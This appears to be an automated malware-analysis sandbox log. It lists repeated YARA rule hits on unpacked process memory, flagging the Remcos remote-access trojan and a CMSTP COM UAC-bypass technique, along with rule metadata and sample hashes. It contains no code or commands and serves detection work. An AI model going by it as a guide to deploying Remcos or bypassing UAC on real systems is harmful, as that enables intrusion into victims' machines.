              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
